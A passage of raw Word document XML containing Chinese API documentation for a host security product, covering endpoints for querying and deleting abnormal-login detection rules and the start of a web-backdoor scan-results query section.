        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B5EBCD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/detect/abnormallogin/linux/rule</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E23C435" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2AE997" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "rows": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "id": "5a9d026a7d761b3ccfcf2c3d",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "osType": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "realmKind": 2,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "realmGroup": 2,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "realmAgentId": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "realmAgentGroup": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "condition": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "loginIps": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "loginTimes": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                        "start": "08:00",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                        "end": "10:00",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                        "startMinutes": 480,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                        "endMinutes": 600,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                        "weeks": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                            1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                            2,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                            3</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                        ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "loginLocations": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                        "country": "中国",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                        "province": "北京",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                        "city": ""</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "combineType": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "combineTypeAll": true</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total": 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62501281"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925"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1315"/>
        <w:gridCol w:w="3974"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="2F7E054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4E2D819" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D890CDF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DBFC665" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="112ABC14" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="59F90FC3" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="109CA572" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6483D28A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3030E6F4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F18EAEB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>规则ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5568201E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42DE963D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>osType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7036794D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74D86253" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C4104F6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>系统类型：1-linux；2-windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="666E32EA" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16A4F512" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>realmKind</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="515A62AB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13881DA1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67E5655B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机范围：0-全部主机；1-主机；2-业务组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2628DDAB" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CA43990" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>realmGroup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33411B23" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63BACEAD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bigint(20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1097AF32" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组，realmKind=2, 该字段有值</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6265BBA8" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08CCAE0F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>realmAgentId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F3E2D1F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F55D686" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B13D1D6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机，realmKind=1, 该字段有值</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0F0E81F5" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73DD0FB8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>realmAgentGroup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02B0F112" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="591CF051" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bigint(20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="463C36C8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机所在业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="02BC43C9" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A9C4BAD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>condition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1910041E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="167AA554" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A25445B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>规则详情，见</w:t>
            </w:r>
            <w:hyperlink w:anchor="condition数据结构">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="af6"/>
                </w:rPr>
                <w:t>condition数据结构</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0B8118B7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="149" w:name="删除规则"/>
      <w:bookmarkEnd w:id="148"/>
      <w:r>
        <w:t>删除规则</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729DDBC7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口提供Linux/Windows异常登录删除规则功能。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D055413" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40773219" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>DELETE /external/api/detect/abnormallogin/{linux,win}/rule/{id}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C9B0B7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="630"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="854"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="5DA4171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F8D28D5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="756450BD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="247A48F0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="024CF6C8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5AAC1D70" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B16D5A6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="360F41A8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0256A9B8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51B9A998" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>规则ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="17F22DC7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D2E7D6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/detect/abnormallogin/linux/rule/5a9d026a7d761b3ccfcf2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7614CD96" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171FF353" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "flag": true</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC66622" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>异常说明：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3948FBEC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>规则不存在，则会抛出异常及相关提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF550D8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>帐号没有权限，会抛出异常及相关提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412B4C94"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497C54" w14:paraId="4EFEDB5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525A900" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00D139AC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="759E38B3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51F2143A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5CE2012E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2231BCDA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6926B0AA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C544FD0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1986A12D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>true:成功 false:失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="655426A3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="150" w:name="web后门"/>
      <w:bookmarkEnd w:id="140"/>
      <w:bookmarkEnd w:id="149"/>
      <w:r>
        <w:t>Web后门</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685B2EC1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="151" w:name="web后门查询结果"/>
      <w:r>
        <w:t>Web后门查询结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1D7F67" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口提供web后门扫描结果数据查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FAD4B5D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76310A6B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/websecurity/webshell/{linux|win}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5269B0B1"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370"/>
        <w:gridCol w:w="904"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1004"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="1FF2925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BAC6006" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5EECAB55" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3875BDF6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1805574B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="63682B1D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37E3FE80" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
